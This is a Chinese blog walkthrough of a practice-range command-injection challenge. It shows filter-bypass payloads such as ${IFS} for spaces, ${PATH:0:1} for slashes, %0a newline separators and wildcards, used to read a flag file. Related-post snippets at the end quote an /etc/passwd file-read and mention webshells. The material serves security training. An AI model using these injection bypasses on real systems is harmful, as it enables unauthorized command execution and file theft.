vulrange命令执行靶场绕过

最新推荐文章于 2024-05-16 10:15:47 发布
最新推荐文章于 2024-05-16 10:15:47 发布
阅读量244 收藏
点赞数
文章标签: 安全 安全漏洞 web
版权声明:本文为博主原创文章,遵循 CC 4.0 BY-SA 版权协议,转载请附上原文出处链接和本声明。
本文链接:https://blog.csdn.net/lionwerson/article/details/115346170
版权

1.开启靶场,提示过滤了cat命令

1.过滤了cat命令可以用其他的命令代替
(1)more
(2)head
(3)sort
等其他的命令替代

|ls
#显示flag文件
|ls flag
#显示flag文件
显示出flag852456.txt
| more flag/flag852456.txt
读取flag

读取到的flag,其实也可以直接访问这个文件。

2.过滤空格

${IFS}

${IFS}$1

$IFS+$1

<>

%09(php环境下)

通过上面三种方式可以绕过空格

但是只可以在命令和参数中进行绕过,用重定向符号时候会报错(>>)

显示flag文件夹下的flag文件

显示flag

|more${IFS}flag/flag294861.txt

3.过滤目录分割符

${PATH:0:1}(linux环境变量)
;使用分割号分割命令,这也是linux的管道符和&作用一样

flag文件

& cd flag && more flag357951.txt

;cd flag;cat flag357951.txt

|cat flag${PATH:0:1}flag357951.txt(没成功,可能是系统的问题)

3.综合过滤

过滤了各种管道符号,斜杠和空格然后还有flag和cat字符,逐一绕过就行

还可以在url输入%0a来执行换行操作,来绕过管道符号和;但是一定要直接输入到浏览器的地址栏上,否则就会被编码成%250a就会失效,%0d,%1a(windows)也可以做命令分割符号来绕过
%0als

一定要直接输入到地址栏中才行!!

%0Als${IFS}fla*

用通配符绕过flag限制

%0Amore$IFS$1fla*${PATH:0:1}fla*.txt (没成功)

%0amore$IFS$9fl*${PATH:0:1}fla*.txt  (没成功)

%0Acd${IFS}fl*%0Amore${IFS}fla*.txt (成功)

%0A绕过管道和;

${PATH:0:1}绕过斜杆

${IFS}绕过空格

fa*通配符绕过flag


要我说只要知道了flag文件夹和flag文件名字直接读取就行了吧



IP/flag/flag753654.txt

这个靶机的flag文件是空的,我就随便写点东西进去就行了。

ps(在过滤目录分割符的时候${PATH:0:1}没有成功,不知道问什么,可能是靶机的原因,请各位大佬不吝赐教。)

lionwerson
关注
  • 0
    点赞
  • 0
    收藏
    觉得还不错? 一键收藏
  • 2
    评论
CVE-2020-13933 靶场: shiro 认证绕过漏洞.zip
01-14
靶场,是指为信息安全人员提供实战演练、渗透测试和攻防对抗等训练环境的虚拟或实体场地。在不同的领域中,靶场扮演着重要的角色,尤其是在网络安全领域,靶场成为培养和提高安全专业人员技能的重要平台。 首先,...
二号靶场.zip
01-14
靶场,是指为信息安全人员提供实战演练、渗透测试和攻防对抗等训练环境的虚拟或实体场地。在不同的领域中,靶场扮演着重要的角色,尤其是在网络安全领域,靶场成为培养和提高安全专业人员技能的重要平台。 首先,...
Vuln-Range之php命令注入
lionwerson的博客
04-04 249
1.开启靶场 简介显示有phpcode注入漏洞,简单绕过之后就可以执行phpinfo(),拿到flag啦。 通过传入name参数的值就可以来进行代码注入了。 2.随便试一个值 http://192.168.0.20:32769/?name=phpinfo() 果然没有那么简单,被过滤了。 3.查看源码 我不太懂php的代码,查阅了一下,可以通过截断的方式来进行绕过 ";phpinfo();"\ #通过;来把拼接的字符串截断就可以绕过了 http://192.168.
vuln-range之ssrf靶场
lionwerson的博客
03-31 557
1.开启靶机 提示用url传入参数进去,直接读出文件,完事。 ?url=file:///etc/passwd #注意三个斜杠
Pikachu靶场-RCE远程命令/代码执行漏洞~保姆级教程!!!
最新发布
2301_77360738的博客
05-16 376
全网最最最详细的Pikachu靶场远程命令/代码执行漏洞,看完包会,小白可入!!!
记录一次vuln靶场的渗透过程---driftingblues9
bobo_milk的博客
05-06 1147
一次小渗透记录 文章目录 前言 一、pandas是什么? 二、使用步骤 1.引入库 2.读入数据 总结 前言 提示:这里可以添加本文要记录的大概内容: 例如:随着人工智能的不断发展,机器学习这门技术也越来越重要,很多人都开启了学习机器学习,本文就介绍了机器学习的基础内容。 提示:以下是本篇文章正文内容,下面案例可供参考 一、pandas是什么? 示例:pandas 是基于NumPy 的一种工具,该工具是为了解决.
Vuln-Range CVE-2017-15715
lionwerson的博客
04-01 209
1.CVE-2017-15715 Apache的解析漏洞,可以上传文件 2.开启靶场 3.通过burp抓包上传webshell 漏洞要通过十六进制在文件末尾添加换行符,来绕过文件上传,但是新版的burp的hex模式直接在右边更改就可以了,先添加一个空格,然后在进行更改。 已经上传成功了,文件已经被解析了。 蚁剑连接一下,连接成功,但是好像没有显示出换行符的文件,我又上传了一个2.php.xxx,但是没有被解析。 ...
命令执行的一些绕过技巧
m0_55754984的博客
09-14 3446
① 空格过滤 空格可以用以下字符串代替: < 、<>、%20(space)、%09(tab)、$IFS$9、 ${IFS}、$IFS等 $IFS在linux下表示分隔符,但是如果单纯的cat$IFS2,bash解释器会把整个IFS2当做变量名,所以导致输不出来结果,然而如果加一个{}就固定了变量名,同理在后面加个$可以起到截断的作用 ,但是为什么要用$9呢,因为$9只是当前系统shell进程的第九个参数的持有者,它始终为空字符串。 ② 一些命令分隔符 linux中:%0a
标准化AWD靶场Docker.zip
01-14
靶场,是指为信息安全人员提供实战演练、渗透测试和攻防对抗等训练环境的虚拟或实体场地。在不同的领域中,靶场扮演着重要的角色,尤其是在网络安全领域,靶场成为培养和提高安全专业人员技能的重要平台。 首先,...
网络安全技术练习靶场.zip
01-14
靶场,是指为信息安全人员提供实战演练、渗透测试和攻防对抗等训练环境的虚拟或实体场地。在不同的领域中,靶场扮演着重要的角色,尤其是在网络安全领域,靶场成为培养和提高安全专业人员技能的重要平台。 首先,...
命令执行靶场实战
qq_23347209的博客
05-31 544
文章目录环境准备一、信息搜集1、nmap扫描2、使用nikto扫描网站目录二、漏洞利用测试三、nc反弹shell 环境准备 靶场下载地址:https://www.vulnhub.com/entry/depth-1,213/ 使用Vmware虚拟机中NAT网络 靶机: 192.168.146.153 攻击机 parrot 192.168.146.129 提示:以下是本篇文章正文内容,下面案例可供参考 一、信息搜集 1、nmap扫描 -A全面扫描 -p-全端口扫描 nmap -A -p- 192.168
网络安全、渗透测试靶场全集
qq_37776764的博客
04-26 833
writeup文章:https://github.com/niudaii/my-vulstack-wp。封神台 - 掌控安全在线攻防演练靶场,一个专为网络安全从业人员设计的白帽黑客渗透测试演练平台。武汉安鸾学院 – 武汉网络安全培训-渗透测试培训-Web安全培训。在线演示: http://vulfocus.fofa.so/10.python2的常见漏洞靶场(python2)LFI-labs 和本地文件包后漏洞利用靶场。Sqli-Labs:(sql注入靶场)3.韩国Webhacking。
橙子科技命令执行靶场
m0_71282722的博客
07-14 518
这个靶场有个坑,这个坑就是在根目录下有一个flag,所以体现了现ls的重要性。要查看文件先确定路径,但是主要是为了熟练命令执行手法。在这个靶场里可以一条路走到黑,但是多一种方法往往又是就多一种出路。
DVWA 靶场之 Command Injection(命令执行)原理介绍、分隔符测试、后门写入与源码分析、修复建议
Welcome To Myon'Blog !
02-26 2921
代替 localhost :在操作系统的配置文件中,通常将 localhost(本地主机名)与 127.0.0.1 绑定在一起,这样在应用程序中使用 localhost 时,实际上是在使用本地回环地址,用于访问本机上运行的网络服务和应用程序。在操作系统中,“ &、|、&&、|| ” 都可以作为命令连接符使用,用户通过浏览器提交执行命令,由于服务器端没有针对执行函数做过滤,导致在没有指定绝对路径的情况下就执行命令。:对服务器和应用程序进行安全配置,关闭不必要的服务和功能,限制可执行命令的范围。
【网络安全---Linux命令绕过】Linux下命令执行绕过技巧(很全,很实用)
m0_67844671的博客
09-24 2204
Linux下命令执行绕过方式和思路;网站上可能有一些能执行系统命令的地方,但是对一些关键字和空格等做了一些防护,如何绕过就成了一个难题,这篇文章分享一些Linux下的命令执行绕过技巧以及思路,不如说空格的绕过,关键字绕过,编码绕过等等;
CTF之命令执行常见绕过
qq_42383069的博客
04-18 5131
在 linux 下表示分隔符,只有cat$IFSa.txt 的时候, bash 解释器会把整个 IFSa当做变量名,所以导致没有办法运行,然而如果加一个 {} 就固定了变量名,同理在后面加个 $ 可以起到截断的作用,而 $9 指的是当前系统shell 进程的第九个参数的持有者,就是一个空字符串,因此 $9 相当于没有加东西,等于做了一个前后隔离。]有一个重要的区别,当匹配的文件不存在,[…通过测试,可见程序过滤了截断符,根据以上的知识,我们来fuzz一下可用的截断符。根据burp爆破,发现可以通过。
命令执行各种绕过总结
m0_64815693的博客
10-11 8618
最近做了题目很多都有命令执行的,这里给自己做一次总结,也给大家一个参考,有各种绕过,十分的详细哦
渗透测试练习靶场汇总
热门推荐
Thunderclap的博客
07-01 1万+
渗透测试 练习常用靶场汇总
Linux下的命令执行绕过技巧合集(渗透测试专用)
Thunderclap的博客
02-23 3442
Linux下的命令执行绕过技巧合集(渗透测试专用)
dvwa靶场中csrf高级怎么绕过
05-19
在DVWA的CSRF高级挑战中,攻击者需要绕过token来成功执行恶意操作。以下是几种常见的绕过方法: 1. 利用XSS漏洞:攻击者可以在受害者的浏览器中注入恶意JavaScript代码,该代码会获取到受害者的CSRF token,然后将...

“相关推荐”对你有帮助么?

  • 非常没帮助
  • 没帮助
  • 一般
  • 有帮助
  • 非常有帮助
提交
评论 2
添加红包

请填写红包祝福语或标题

红包个数最小为10个

红包金额最低5元

当前余额3.43前往充值 >
需支付:10.00
成就一亿技术人!
领取后你会自动成为博主和红包主的粉丝 规则
hope_wisdom
发出的红包
实付
使用余额支付
点击重新获取
扫码支付
钱包余额 0

抵扣说明:

1.余额是钱包充值的虚拟货币,按照1:1的比例进行支付金额的抵扣。
2.余额无法直接购买下载,可以购买VIP、付费专栏及课程。

余额充值